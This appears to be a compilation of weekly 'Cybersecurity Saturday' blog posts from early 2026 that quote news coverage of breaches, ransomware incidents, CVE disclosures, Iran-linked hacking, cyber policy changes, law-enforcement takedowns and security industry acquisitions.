    • “Threat hunters and a collection of unconfirmed victims are responding to a series of attacks targeting Salesforce customers, which the vendor disclosed in a security advisory Saturday [March 7]. 
    • “Salesforce is actively monitoring threat activity targeting public-facing Experience Cloud sites, including attempts to take advantage of overly permissive guest user configurations,” the company said in the alert.
    • “The campaign marks the third widespread attack spree targeting Salesforce customers in about six months. 
    • “The number of victims ensnared by the latest attacks is unverified, but ShinyHunters, the threat group asserting responsibility for the attacks, claims about 100 companies have already been impacted.”
  • and
    • “A maximum-severity vulnerability in pac4j, an open-source library integrated into hundreds of software packages and repositories, poses a significant security threat, but has thus far received scant attention.
    • “The defect in the Java security engine, which handles authentication across multiple frameworks, has not been exploited in the wild since code review firm CodeAnt AI published a proof-of-concept exploit last week. The company discovered the vulnerability and privately reported it to pac4j’s maintainer, which disclosed the defectand released patches for affected versions of the library within two days.
    • “Some researchers told CyberScoop they are concerned about the vulnerability — CVE-2026-29000 — because it affects a widely deployed Java security engine that attackers can exploit with relative ease.
    • “A threat actor only needs to access a server’s public RSA key to attempt exploitation,” researchers at Arctic Wolf Labs said in an email. 
  • Cybersecurity Dive points out,
    • “Prolific cybercrime gangs have begun using AI to help them generate malware, signaling a “fundamental shift of dynamics” in the threat environment, IBM’s X-Force threat intelligence team said in a report published on Thursday [March 12].
    • “The malware, which IBM called Slopoly, is “relatively unspectacular” but nonetheless a harbinger of a coming future in which automated code development can rapidly accelerate the hacking life cycle, according to the report.
    • “IBM linked the malware to Hive0163, a group of hackers who have used the Interlock ransomware in several recent major attacks.”
  • Dark Reading notes,
    • “Exploitation of user-managed cloud software has overtaken credential abuse as the method by which most attackers gain initial access to cloud resources.
    • “In its semi-annual “Cloud Threat Horizons Report,” Google found attacks on user-managed software applications — such as the the React2Shell attack targeting a flaw in React Server Components — bested software vulnerabilities to become the most frequently exploited vector for initial access. Overall, “software-based entry,” which includes exploiting software vulnerabilities such as remote code execution (RCE) flaws, accounted for about 44% of all initial-access activity in Google Cloud, the company stated in the report.
    • “The shift is likely due to the company’s focus on secure-by-default strategies and cloud users taking measures to shrink the stolen credentials and misconfiguration attack surfaces, says Crystal Lister, a security adviser in the Office of the CISO at Google Cloud.
    • “As defenders address some of the initial, enduring cloud hygiene issues, attackers are being forced to focus on more sophisticated, automated paths,” she says. “It isn’t necessarily that companies are cutting corners, but rather that the defensive perimeter has moved. Attackers are now targeting the third-party user-managed software running on top of the cloud rather than the cloud infrastructure itself.”

From the ransomware front,

  • Spiceworks explains “why encrypted backups may fail in an AI-driven ransomware era.” Check it out.
  • Healthcare IT News tells us how to stop ransomware disruption with better planning.
    • “Lessons from a LockBit ransomware attack can keep healthcare organizations running when faced with a cyberattack, said Zachary Lewis, CIO and CISO at University of Health Sciences and Pharmacy, in his HIMSS26 Cyber Forum keynote.”
  • Two former federal government cybersecurity officials, writing in Cyberscoop, point out,
    • “We’ve seen ransomware cost American lives. Here’s what it will actually take to stop it.
    • “Hackers have cut their attack timelines from weeks to hours while the government spreads resources too thin. We need to stop pretending we can protect everything and start focusing on what would hurt us most.”

From the cybersecurity business and defenses front,

  • Cybersecurity Dive reports,
    • “Google on Wednesday said it completed a $32 billion agreement to buy Wiz, a leading cloud and AI security platform, marking one of the largest-ever acquisitions in the cybersecurity market. 
    • “The deal will allow Google to provide a comprehensive security offering to both government and enterprise customers operating across multicloud environments. 
    • “Wiz works across the leading cloud providers, including Amazon Web Services, Microsoft Azure and Oracle Cloud. 
    • “The platform will continue to operate under its own brand name, while providing a broad range of services through its integration with Google Cloud.”
  • Security Week relates,
    • “OpenAI announced this week that it’s in the process of acquiring AI security company Promptfoo.
    • “Financial terms of the acquisition have not been disclosed, but Promptfoo has raised more than $23 million and was reportedly valued at $86 million (based on PitchBook data) following an $18.4 million Series A funding round in July 2025.
    • “Promptfoo has developed a security and evaluation platform designed to systematically test LLMs and AI agents. * * *
    • “Once it completes the acquisition, OpenAI plans to integrate Promptfoo’s capabilities into its Frontier platform, which enterprises use to build and operate AI coworkers.  
    • “Promptfoo brings deep engineering expertise in evaluating, securing, and testing AI systems at enterprise scale. Their work helps businesses deploy secure and reliable AI applications, and we’re excited to bring these capabilities directly into Frontier,” said Srinivas Narayanan, CTO of B2B Applications at OpenAI.”
  • Cyberscoop tells us,
    • “Artificial intelligence may be enhancing cyber threats, but the defensive approach to those AI-amplified attacks remains the same, a top FBI official said Tuesday.
    • “We have seen actors both criminal and nation-state, they’re absolutely using AI to their advantage,” said Jason Bilnoski, deputy assistant director at the FBI’s cyber division. “But the way attacks unfold have not changed. Cyberattacks still follow basic steps. It just becomes an incredible speed now.”
    • “The best way to deal with those attacks is to implement all the traditional defenses, like those the FBI has been emphasizing as part of its Operation Winter SHIELD media campaign, he said.
    • “Don’t worry about the speed and capability” of AI attacks, Biloski said at a Billington Cybersecurity conference. “If you’re focused on the basics, it’ll help prevent the actual intrusion from occurring.
    • “It’s a message that the acting director of the Cybersecurity and Infrastructure Security Agency, Nick Andersen, also shared at the conference. Sophisticated attackers are out there, he said, but the agency’s recent binding operational directive for federal agencies to get rid of unsupported edge devices was a way of shoring up basic vulnerabilities.”
  • Dark Reading informs us,
  • Tech Target points out how to choose the best mobile hotspot for remote work.
    • “Organizations that support remote work should understand how personal hotspots and dedicated hotspot devices differ. Compare these mobile hotspot options.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the Iran War front,

  • Security Week reports,
    • “The Iranian APT MuddyWater has hacked into the networks of several organizations in the US, including an aerospace and defense contractor, Broadcom’s Symantec and Carbon Black threat hunting team reports.
    • “The threat actor has been present in the environments of an airport, a bank, a non-governmental organization operating in the US and Canada, and a software company with a presence in Israel.
    • “According to the Broadcom experts, the APT’s activity has continued “in recent days following US and Israeli military strikes on Iran that have sparked conflict in the region”.
  • Cybersecurity Dive adds,
    • “Pro-Russia threat actors have formed a loose coalition with Iran-nexus hacking groups in response to the bombing campaign launched by the U.S. and Israel on Iran. 
    • “The groups began working together Monday under the #OpIsrael campaign, with a focus on targeting critical infrastructure and exfiltration of data, according to researchers at Flashpoint.” * * *
    • Researchers at Palo Alto Networks Unit 42 estimate that about 60 threat actors, including Iran-nexus and Russia-aligned groups, might be involved in various levels of hacking activity since the bombing campaign began.”  
  • The American Hospital Association News tells us,
    • “The FBI is reminding critical infrastructure organizations to implement mitigations from a June 2025 fact sheet on potential actions by Iranian-affiliated cyber actors who may target U.S. devices and networks due to geopolitical tensions. The fact sheet explains how cyber actors often exploit targets with unpatched or outdated software with known common vulnerabilities or passwords.  
    • “In the context of the ongoing conflict with Iran, it is particularly important to ensure that we are implementing cybersecurity measures to defend against the known tactics used by Iranian state-sponsored hackers or pro-Iranian hackers acting independently,” said John Riggi, AHA national advisor for cybersecurity and risk. “Besides seeking to exploit common vulnerabilities and default passwords, they also target internet-connected operational technology and industrial control systems. These systems may be present in hospitals in the form of HVAC, water, life-safety and building automation systems. It is recommended that cyber teams closely coordinate with facilities and building engineers to identify internet-facing OT and ICS systems, assess the need for internet connectivity and ensure they are patched and secure.”

From the cybersecurity policy and law enforcement front,

  • The Wall Street Journal reports,
    • “The Trump administration published its new cyber strategy Friday [March 6], framing digital security in the context of broader geopolitical issues and promising to incentivize the private sector to identify and disrupt cyber adversaries.
    • “Compared with the Biden administration’s 2023 National Cybersecurity Strategy, which ran more than 35 pages and detailed dozens of policy initiatives, the new document is far shorter at five pages and sets out broad principles for future policy decisions and priorities.”
  • Cyberscoop adds,
    • “The strategy “calls for unprecedented coordination across government and the private sector to invest in the best technologies and continue world-class innovation, and to make the most of America’s cyber capabilities for both offensive and defensive missions,” the White House said in a statement accompanying its release.”
    • “Trump also signed an executive order Friday directing agencies to take action to combat cybercrime and fraud.”
  • The Congress did not resolve the Department of Homeland Security shutdown this week.
  • Fedscoop reports,
    • “The Department of Homeland Security is undergoing an overhaul of its IT and information security leadership, with multiple sources telling FedScoop there is a broad realignment underway at the department to replace key technology leaders.
    • “FedScoop has learned that at least two DHS officials are being replaced: Chief Information Security Officer Hemant Baidwan and Deputy CISO Amanda Day. 
    • “The reorg among IT officials comes as other leadership is changing at the department. President Donald Trump announced Thursday that Secretary of Homeland Security Kristi Noem will be leaving the position at the end of March. Trump has nominated Sen. Markwayne Mullin, R-Okla, as her replacement.
  • Cybersecurity Dive adds,
    • “The confirmation prospects for Sean Plankey, President Donald Trump’s nominee to lead the Cybersecurity and Infrastructure Security Agency, have dimmed further following Plankey’s unceremonious departure from a job at the Department of Homeland Security.
    • “Security personnel escorted Plankey out of a DHS facility on Monday, a person familiar with the matter told Cybersecurity Dive, confirming an incident first reported by CBS News. Plankey announced on Wednesday that he had left his job as a senior Coast Guard adviser to DHS Secretary Kristi Noem, but he framed his departure as a voluntary one intended to help him focus on his nomination to serve as CISA director.”
  •  Per an HHS news release,
    • “Today [March 5], the U.S. Department of Health and Human Services’ (HHS) Office for Civil Rights (OCR) announced a settlement with MMG Fusion, LLC (MMG), a Maryland software company, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Privacy, Security, and Breach Notification Rules. MMG is a business associate as it receives protected health information (PHI) from HIPAA covered entities and its software is used to communicate directly with patients of covered entities.” * * *
    • “The settlement resolves an investigation that OCR initiated in March 2023 after receiving a complaint concerning an unreported security incident at MMG, and the posting of PHI on the dark web. OCR’s investigation determined that in December 2020, an unauthorized actor infiltrated MMG’s information system and accessed PHI [of 15 million people], including names, phone numbers, mailing addresses, email addresses, dates of birth, and dates and times of medical appointments.” * * *
    • “The resolution agreement and corrective action plan may be found at https://www.hhs.gov/sites/default/files/ocr-mmg-fusion-hipaa-agreement.pdf [PDF, 264 KB].”
  • Cybersecurity Dive informs us,
    • “An international coalition led by Microsoft and Europol has taken down the operations of Tycoon 2FA, a notorious phishing-as-a-service platform that helped cyber criminals gain access to millions of email accounts across the globe. 
    • “Microsoft obtained a court order from the U.S. District Court from the Southern District of New York to seize 330 active domains used to back the core infrastructure of Tycoon 2FA.
    • “Taking this infrastructure offline cuts off a major pipeline for account takeovers and helps protect people and organizations from follow-on attacks such a data theft, ransomware, business email compromise and financial fraud,” Steve Masada, assistant general counsel at Microsoft’s Digital Crimes Unit, said in a blog post published Wednesday.” 
  • Bleeping Computer lets us know,
    • “The FBI has seized the LeakBase cybercrime forum, a major online forum used by cybercriminals buy and sell hacking tools and stolen data.
    • This seizure action is part of an international joint operation coordinated by Europol, known as “Operation Leak,” that involved law enforcement agencies in 14 countries.
    • On March 3 and 4, the FBI and law enforcement agents shut down LeakBase by seizing two of its domains, posting seizure banners, and warning LeakBase members of the seizure after collecting further evidence.” * * *
    • Today’s [March 4] announcement follows the disruption of RaidForums in 2022 and BreachForums in 2023, two cybercrime marketplaces that preceded it, as well as the BreachForums founder’s conviction and sentencing in 2025.
  • and
    • “A U.S. government contractor’s son, accused of stealing more than $46 million in cryptocurrency from the U.S. Marshals Service, was arrested Wednesday on the island of Saint Martin.
    • “The arrest was the result of a joint operation between the FBI and France’s elite Groupe d’Intervention de la Gendarmerie Nationale, FBI Director Kash Patel announced on Thursday.
    • “Last night, John Daghita – a U.S. government contractor who allegedly stole more than $46 million in cryptocurrency from the U.S Marshals Service – was arrested on the island of Saint Martin by the French Gendarmerie’s premier elite tactical unit in a joint operation with the @FBI,” Patel said.”
  • Cyberscoop points out,
    • “Russian national Evgenii Ptitsyn pleaded guilty to running the Phobos ransomware outfit that extorted more than $39 million from more than 1,000 victims globally, the Justice Department said Wednesday.
    • “Ptitsyn assumed a leadership role in the Phobos ransomware group in January 2022, yet his criminal activities began by April 2019, according to court records. He continued leading the cybercrime syndicate until May 2024 when he was arrested in South Korea. Ptitsyn was extradited to the United States in November 2025.
    • “Federal prosecutors dropped multiple charges against Ptitsyn as part of a plea agreement he signed last month. He faces up to 20 years in prison for wire fraud conspiracy.
    • “Ptitsyn agreed to forfeit $1.77 million in assets and is required to pay at least $39.3 million in restitution, representing the full amount of his victims’ losses.

From the cybersecurity breaches and vulnerabilities front,

  • The Wall Street Journal reports on March 6,
    • “U.S. investigators believe hackers affiliated with the Chinese government are responsible for a cyber intrusion on an internal Federal Bureau of Investigation computer network that holds information related to some domestic surveillance orders, according to people familiar with the matter.
    • “The scope and severity of the intrusion aren’t known, and the investigation is in its early stages, the people said. Any preliminary conclusions could change as investigators gather more information. 
    • “If China is confirmed to be responsible for the breach, it would signal the latest intrusion by Beijing’s hackers of computer systems related to law-enforcement surveillance orders, which contain highly sensitive material.
    • “A notification sent in recent days to some lawmakers in Congress said the FBI began investigating the matter last month, the people said. The intrusion involved hackers accessing an unclassified system that contains information about the calls and internet activity of criminal suspects and others under government surveillance. Information in the system includes incoming and outgoing calls, IP and website addresses and some routing information, but doesn’t include the contents of calls or digital communication.” 
  • Cybersecurity Dive adds,
    • “A total of 90 zero-day vulnerabilities were exploited in the wild in 2025, according to a report released Thursday by Google Threat Intelligence Group.
    • “Of that total, almost half of the exploited vulnerabilities were used against enterprise-grade technology, marking an all-time high. 
    • “Exploitation from state-sponsored groups targeted networking and security tools with a strong emphasis on edge devices, which often lack endpoint detection and response capabilities, according to GTIG researchers. 
    • “China-nexus groups remain the most prolific state-sponsored groups, with a long history of detailed knowledge of vulnerable devices. 
    • “They have a significant zero-day development ecosystem that includes industry, academia, and government,” John Hultquist, chief analyst at GTIG, told Cybersecurity Dive.”
  • Bleeping Computer relates,
    • “TriZetto Provider Solutions, a healthcare IT company that develops software and services used by health insurers and healthcare providers, has suffered a data breach that exposed the sensitive information of over 3.4 million people.
    • “The firm, which has been operating under the Cognizant umbrella since 2014, disclosed that it detected suspicious activity on a web portal on October 2, 2025, and launched an investigation with the help of external cybersecurity experts.
    • “The investigation revealed that unauthorized access began nearly a year before, on November 19, 2024.’ * * *
    • “Affected providers were alerted on December 9, 2025, but customer notification started in early February 2026. According to a filing Maine’s Attorney General submitted today [March 6], the number of exposed individuals is 3,433,965.
    • “TriZetto says that payment card, bank account, or other financial information was not exposed in this incident. Also, the company is not aware of any cases where cybercriminals have attempted to misuse this information.”
  • CISA added seven known exploited vulnerabilities to its catalog this week.
    • March 3, 2026
      • CVE-2026-21385 Qualcomm Multiple Chipsets Memory Corruption Vulnerability
      • CVE-2026-22719 Broadcom VMware Aria Operations Command Injection Vulnerability
        • Cybersecurity News discusses the Qualcomm KVE here.
        • Bleeping Computer discusses the VM Aria KVE here.
    • March 5, 2026
      • CVE-2017-7921 Hikvision Multiple Products Improper Authentication Vulnerability
      • CVE-2021-22681 Rockwell Multiple Products Insufficient Protected Credentials Vulnerability
      • CVE-2021-30952 Apple Multiple Products Integer Overflow or Wraparound Vulnerability
      • CVE-2023-41974 Apple iOS and iPadOS Use-After-Free Vulnerability
      • CVE-2023-43000 Apple Multiple products Use-After-Free Vulnerability
        • The Hacker News discusses the Hikvision and Rockwell KVEs here.
        • Bleeping Computer discusses the Apple KVEs here.
  • Cyberscoop adds,
    • “Cisco released information on a pair of max-severity vulnerabilities in its firewall management software Wednesday that unauthenticated, remote attackers could exploit to obtain the highest level of access to the underlying operating system or on affected devices.
    • “The vulnerabilities — CVE-2026-20079 and CVE-2026-20131 — affect the web-based interface of Cisco Secure Firewall Management Center (FMC) Software, regardless of device configuration, the vendor said.
    • “Cisco disclosed the critical vulnerabilities one week after it warned that attackers have been exploiting a pair of zero-days in Cisco’s network edge software for at least three years. That campaign, which is ongoing, marked the second series of multiple actively exploited zero-days in Cisco edge technology since last spring. 
    • “Both campaigns prompted the Cybersecurity and Infrastructure Security Agency to issue emergency directives months after the attacks were first detected, and both attack sprees were underway for at least a year before they were discovered.” 
  • and
    • “Google disclosed one actively exploited zero-day vulnerability Monday, warning that the high-severity defect affecting an open-source Qualcomm display component for Android devices “may be under limited, targeted exploitation.”
    • “The memory-corruption vulnerability — CVE-2026-21385 — which Google’s Androidsecurity team reported to Qualcomm Dec. 18, affects 234 chipsets, Qualcomm said in a security bulletin. Qualcomm said it notified customers of the vulnerability Feb. 2.
    • “Qualcomm declined to say when the earliest known instance of exploitation occurred, how many victims have been directly impacted, and what occurred during the 10-week period between the reporting and public disclosure of the vulnerability. 
    • “We commend the researchers from Google’s Threat Analysis Group for using coordinated disclosure practices,” a Qualcomm spokesperson told CyberScoop. “Fixes were made available to our customers in January 2026. We encourage end users to apply security updates as they become available from device makers.”
  • and
    • “North Korean threat groups are using artificial intelligence tools to accelerate and expand the country’s long-running scheme to get remote technical workers hired at global companies for longer durations, Microsoft Threat Intelligence said in a report Friday. 
    • “AI services are empowering North Korean operatives across the attack lifecycle. Attackers have turned AI into a “force multiplier” that bolsters and automates their efforts to conduct research on targets, develop malicious resources, achieve and maintain access, evade detection, and weaponize tools for attacks and post-compromise activities, researchers said.
    • “Microsoft said a trio of groups it tracks as Coral Sleet, Sapphire Sleet and Jasper Sleet are using AI to shorten the time it takes to create digital personas for specific job markets and roles. These groups frequently leverage financial opportunities or interview-themed lures to gain initial access.”
  • The Hacker News notes,
    • “Cybersecurity researchers have disclosed details of a new phishing suite called Starkiller that proxies legitimate login pages to bypass multi-factor authentication (MFA) protections.
    • “It’s advertised as a cybercrime platform by a threat group calling itself Jinkusu, granting customers access to a dashboard that lets them select a brand to impersonate or enter a brand’s real URL. It also lets users choose custom keywords like “login,” “verify,” “security,” or “account,” and integrates URL shorteners such as TinyURL to obscure the destination URL.
    • “It launches a headless Chrome instance – a browser that operates without a visible window – inside a Docker container, loads the brand’s real website, and acts as a reverse proxy between the target and the legitimate site,” Abnormal researchers Callie Baron and Piotr Wojtyla said.”

From the ransomware front,

  • The Record reports,
    • “The University of Hawaiʻi Cancer Center said up to 1.2 million people had information leaked as a result of a ransomware attack on its epidemiology division last year. 
    • “Hackers accessed records containing Social Security numbers (SSNs) and driver’s license numbers collected from the Hawaiʻi State Department of Transportation as well as City and County of Honolulu voter registration records from 1998, according to a statement released by the organization last week.” * * *
    • “In January, the university sent a report to the state legislature that said the cyber incident was first discovered on August 31, 2025.” * * *
    • “Naoto Ueno, director of the University of Hawaiʻi Cancer Center, apologized for the incident last week and said the organization was “committed to transparency.” 
    • “The university said the attackers encrypted and likely exfiltrated data, prompting them to notify law enforcement and hire cybersecurity experts to resolve the situation. The cybersecurity firm obtained a decryption tool and secured “an affirmation that any information obtained was destroyed.”  
    • “University officials claimed there is “no evidence that any of the information has been published, shared or misused.” The group responsible for the attack was not identified.”   
  • Cybersecurity Dive relates,
    • “Identity has replaced malware as the biggest threat vector opening the door for ransomware attacks, Cloudflare said in an annual threat report published on Tuesday.
    • “Hackers’ increasing use of legitimate credentials, rather than malicious code, is making it harder for defenders to detect and contain their attacks.
    • “Cloudflare’s new report also discussed nation-state threat actors’ behavior and how artificial intelligence is changing attacks.”
  • Mobihealth News interviews Scott Doerr, virtual CISO, or vCISO, at Fortified Health Security, [who] previews his upcoming talk at the 2026 HIMSS Global Health Conference & Exposition, where he will discuss how healthcare companies can strengthen their preparedness for ransomware attacks. 

From the cybersecurity business and defenses front,

  • Cyberscoop reports,
    • “CrowdStrike Holdings reported record earnings in the fiscal fourth-quarter, defying investor concerns about the rising use of agentic AI potentially curbing demand for cybersecurity software and services. 
    • “The Texas-based cybersecurity company said total revenue grew 23% on a year-over-year basis, to $1.31 billion in the quarter ended Jan. 31. 
    • “Annual recurring revenue, a closely watched metric among cybersecurity companies, grew 24%, to $5.25 billion. 
    • “The results come at a time of growing market anxiety about how AI adoption could render traditional software — including cybersecurity tools — obsolete. CrowdStrike executives acknowledged those larger industry concerns and noted the Q4 performance was a demonstration that certain companies were well-positioned to compete in the new marketplace.” 
  • ZDNet adds,
    • “Anthropic, OpenAI, and Google tools can automate code debugging. 
    • “But cybersecurity is too complex a problem for these tools to solve. 
    • “AI’s biggest contribution may be to reduce avoidable software flaws. 
  • Healthexec relates,
    • “In January, National Security Agency (NSA), released protocols for the U.S. Department of War to achieve “zero trust” security across the agency, meaning any access to the network must come from something continually inside it. While such a setup would be technically demanding for healthcare, the American Hospital Association (AHA) said it may be time for facilities to start moving in that direction.
    • “Zero trust security would mean radical changes for hospitals, where a countless number of devices have access to networks, including everything from EHRs to medical devices, to tablets and smartphones used for communication.
    • “What the NSA wants the Department of War to adopt is a system where no one gains access to a network from the outside, meaning no logins or passwords. In fact, even systems connected to the network from the inside are not automatically trusted.
    • “In other words, every user, device, and system must continually prove they are allowed access—and access is limited strictly to what’s necessary.
    • “The ethos of zero trust means that it’s assumed even the network itself isn’t safe, hence the continuous verification. Something like a two-factor authentication app displaying a constant active code would be required to log on.”
  • The AHA News adds,
  • SC World tells us,
    • “The 2026 Zero Trust World conference kicked off here Wednesday (March 4) with a particularly optimistic keynote by futurist and TV host Jason Silva and also featured a last-minute addition in the form of a talk by former White House CIO Theresa Payton.
    • “But it was the smaller sessions, including a dark-web primer and a live Security Now! podcast broadcast featuring cybersecurity veterans Steve Gibson and Leo LaPorte, that stole the show during the first day of ThreatLocker’s annual user conference.”
  • Tech Target explains “how to perform a data risk assessment, step by step.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “The Trump administration late Thursday removed the scandal-plagued acting director of the Cybersecurity and Infrastructure Security Agency, injecting fresh uncertainty into the operations of an agency already grappling with a morale crisis as it tries to protect the U.S. from sophisticated hacking threats.
    • “The Department of Homeland Security reassigned Madhu Gottumukkala, the deputy CISA director who had led the agency in an acting capacity since last May, to a position at DHS headquarters. Nick Andersen, the executive assistant director for CISA’s Cybersecurity Division and one of the few remaining political appointees at the agency, will step in as acting director.”
  • Federal News Network adds,
    • “Sen. Ron Wyden (D-Ore.) is blocking the Trump administration’s nominee to lead both U.S. Cyber Command and the National Security Agency. Wyden said Lt. Gen. Joshua Rudd, who currently serves as the deputy commander of U.S. Indo-Pacific Command, lacks the experience needed to immediately step into the dual leadership role. The lawmaker added that when it comes to U.S. cybersecurity, “there is simply no time for on-the-job learning, the threat is just too urgent for that.”
  • Gov Info Security relates,
    • “A bipartisan group of senators called on the federal government to update the regulations governing healthcare cybersecurity through a Thursday vote sending a bill aimed at bolstering sector resilience to the full Senate.
    • ‘The Senate Health, Education, Labor and Pensions Committee voted 22 to 1 to advance the Health Care Cybersecurity and Resiliency Act, a bill that requires publishing cybersecurity guidance for rural medical practices and improved coordination between federal agencies.
    • It has the backing of a healthcare cybersecurity working group that includes committee Chair Bill Cassidy, R-La.
    • “The legislation would additionally bolster an apparently stalled effort to update the HIPAA Security Rule that the Department of Health and Human Services published during the final weeks of the Biden administration (see: What’s in HHS’ Proposed HIPAA Security Rule Overhaul?).
    • “The bill would enforce many of the proposed rule’s updates, including requiring HIPAA-covered organizations and business associates to adopt multifactor authentication and encryption, to conduct audits, including penetration testing. It additionally calls for “other minimum cybersecurity standards” to be determined by the HHS secretary, “in consultation with private sector organizations, based on landscape analysis of emerging and existing cybersecurity vulnerabilities and consensus-based best practices.”
    • “The fate of the Biden administration’s proposed HIPAA overhaul is uncertain at this point. The HHS Office of Civil Rights is expected to make some kind of decision in May on whether it will move forward with the proposals, or perhaps issue a revised version of proposed rulemaking.”
  • Cyberscoop notes,
    • “An ex-L3 Harris executive was sentenced to over seven years in prison Tuesday after pleading guilty to selling eight zero-day exploits to a Russian broker in exchange for millions of dollars.
    • “Peter Williams, 39, admitted to two counts of theft of trade secrets in U.S. District Court in Washington, D.C., last year, acknowledging he took at least eight exploits or exploit components while working at Trenchant, a specialized cybersecurity unit owned by L3Harris. Prosecutors said the materials were intended for restricted use by the U.S. government and allied partners.
    • “Authorities said Williams sold the stolen information to a broker that advertised itself as a reseller of hacking tools and described it as serving multiple customers, including the Russian government. In court, the government referred to the buyer as “Company 3,” but details read aloud during the plea hearing pointed to Operation Zero, a Russian exploit broker that publicly markets itself online as a platform for purchasing zero-day vulnerabilities.”

From the cybersecurity breaches and vulnerabilities front,

  • Cybersecurity Dive reports,
    • “Federal agencies have until Friday evening [February 27] to update certain Cisco networking devices that are vulnerable to compromise, the Cybersecurity and Infrastructure Security Agency said on Tuesday [February 24].
    • “In an emergency directive about Cisco’s Software-Defined Wide-Area Networking (SD-WAN) systems, CISA said it was “aware of a cyber threat actor’s ongoing exploitation” of two vulnerabilities in Cisco Catalyst SD-WAN Manager and Catalyst SD-WAN Controller devices and called the activity “an imminent threat to federal networks.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency on Thursday warned that a malware variant previously used in attacks against Ivanti Connect Secure environments may remain undetected on systems. 
    • “In March 2025, CISA issued an alert about the malware, dubbed Resurge, in connection with exploitation of CVE-2025-0282, a stack-based buffer overflow vulnerability in certain versions of Ivanti Connect Secure and other Ivanti products. 
    • “The agency has since analyzed three samples from a critical infrastructure provider’s Ivanti Connect Secure device after hackers exploited the flaw to gain initial access. The analysis shows that Resurge can remain latent on a device until a remote hacker attempts to contact the device.” 
  • Cyberscoop adds,
    • “Would-be attackers spent 2025 swimming in a sea of more than 40,000 newly published vulnerabilities, VulnCheck said in a report released Wednesday, but only 1% of those defects, just 422, were exploited in the wild.
    • “As the deluge of vulnerabilities grows every year, and CVSS ratings lose significance for vulnerability management prioritization, some defenders are turning to research on known exploited vulnerabilities to narrow their scope of work and place more emphasis on verified risks. 
    • “The growth in CVE volume is ludicrous, not necessarily unfounded, but it’s large. Defenders don’t know what to pay attention to,” Caitlin Condon, vice president of security research at VulnCheck, told CyberScoop. “Prioritization is still a huge problem.”
    • “Too many defenders and researchers are paying attention to defects and unsubstantiated exploit concepts that aren’t worth their time, Condon added. “The indicators of risk that used to be semi reliable, now no longer are.”
  • and
    • “Cyberattacks reached victims faster and came from a wider range of threat groups than ever last year, CrowdStrike said in its annual global threat report released Tuesday, adding that cybercriminals and nation-states increasingly relied on predictable tactics to evade detection by exploiting trusted systems.
    • “The average breakout time — how long it took financially-motivated attackers to move from initial intrusion to other network systems — dropped to 29 minutes in 2025, a 65% increase in speed from the year prior. “The fastest breakout time a year ago was 51 seconds. This year it’s 27 seconds,” Adam Meyers, head of counter adversary operations at CrowdStrike, told CyberScoop.
    • “Defenders are falling behind because attackers are refining their techniques, using social engineering to access high-privilege systems faster and move through victims’ cloud infrastructure undetected.”
  • Cybersecurity Dive points out,
    • “Hackers are increasingly integrating artificial intelligence into all phases of the cyberattack life cycle, with the technology regularly analyzing target information, generating phishing emails and providing coding assistance, security firm ReliaQuest said in a report published on Tuesday [February 24].
    • “Other recent reports from IBM and cyber insurer Resilience similarly highlight how AI has changed the threat landscape.
    • At the same time, a new Sophos report said it was important to put in perspective AI’s ‘capabilities and impact.”
  • LinkedIn informs us,
    • “One of the largest data breaches in U.S. history is even bigger than was known. The Conduent cyberattack has now affected more than 25 million Americans, according to a recent update. The January 2025 incident exposed Social Security numbers, medical records and other sensitive information. Conduent is one of the largest contractors for the U.S. government, providing mailroom, printing and payment processing services for state government benefit offices — meaning it manages “a large amount of personal information belonging to a large swath of the United States,” per TechCrunch.”
  • Cybersecurity Dive adds,
    • “Hackers working for the Chinese government broke into more than 50 telecommunications companies and government agencies in 42 countries, in a campaign that exploited cloud platforms’ legitimate features to hide the attackers’ tracks.
    • “The attacker was using API calls to communicate with [software-as-a-service] apps as command-and-control (C2) infrastructure to disguise their malicious traffic as benign,” researchers at Google’s Threat Intelligence Group and Mandiant said in a report on Wednesday.
    • “Google said the “prolific, elusive” China-linked hacker team, which it tracks as UNC2814, “has a long history of targeting international governments and global telecommunications organizations across Africa, Asia, and the Americas.”

From the ransomware front,

  • The Mississippi Clarion Ledger reports,
    • “Officials with the University of Mississippi Medical Center stated the hospital system is “getting closer to full functions” following a cyberattack on Feb. 19 that disrupted operations.
    • “UMMC issued a statement Friday, Feb. 27, stating after being able to access patient records, clinics statewide will resume normal operations and scheduled appointments on Monday, March 2.
    • “UMMC also stated that on March 2, clinics will begin reaching out to patients to reschedule appointments that were cancelled. Officials added that UMMC clinics will reopen with extended hours and additional days in order to accommodate patients as soon as possible.
    • “All hospitals and emergency departments located in Jackson, Madison County, Holmes County and Grenada remain open.”
  • Cybersecurity Dive relates,
    • “UFP Technologies, a Massachusetts-based medical device maker, said it is investigating a cyberattack in mid-February that led to some of its company data being stolen or potentially destroyed, according to a regulatory filing
    • “The company said the attack, which was detected Feb. 14, impacted most of its IT network, as well as its billing and label-making capabilities for customer deliveries. The company said it was able to continue operations using data backups and implementing contingency plans.
    • “This was a classic ransomware attack that appeared to have impacted many, but not all, of our IT systems,” Ronald Lataille, chief financial officer at UFP Technologies, said Wednesday on a quarterly conference call with analysts. “Data was taken and then destroyed.”
    • “The company is still trying to figure out how much sensitive information, including personally identifiable data, may have been impacted by the attack, according to the 8-K filing with the Securities and Exchange Commission. However, the company does not currently believe the attack will have a material impact on its financial condition.”
  • The Hacker News adds,
    • “The North Korea-linked Lazarus Group (aka Diamond Sleet and Pompilus) has been observed using Medusa ransomware in an attack targeting an unnamed entity in the Middle East, according to a new report by the Symantec and Carbon Black Threat Hunter Team.
    • “Broadcom’s threat intelligence division said it also identified the same threat actors mounting an unsuccessful attack against a healthcare organization in the U.S. Medusa is a ransomware-as-a-service (RaaS) operation launched by a cybercrime group known as Spearwing in 2023. The group has claimed more than 366 attacks to date.
    • “Analysis of the Medusa leak site reveals attacks against four healthcare and non-profit organizations in the U.S. since the beginning of November 2025,” the company said in a report shared with The Hacker News.”
  • The Register informs us,
    • “Ransomware payments cratered in 2025, but it seems like the cybercrooks launching the attacks didn’t get the memo.
    • “That’s the headline from Chainalysis’ 2026 Crypto Crime Report, which shows total on-chain ransomware payments falling for a second straight year, even as victim counts and leak site pressure continue to climb.
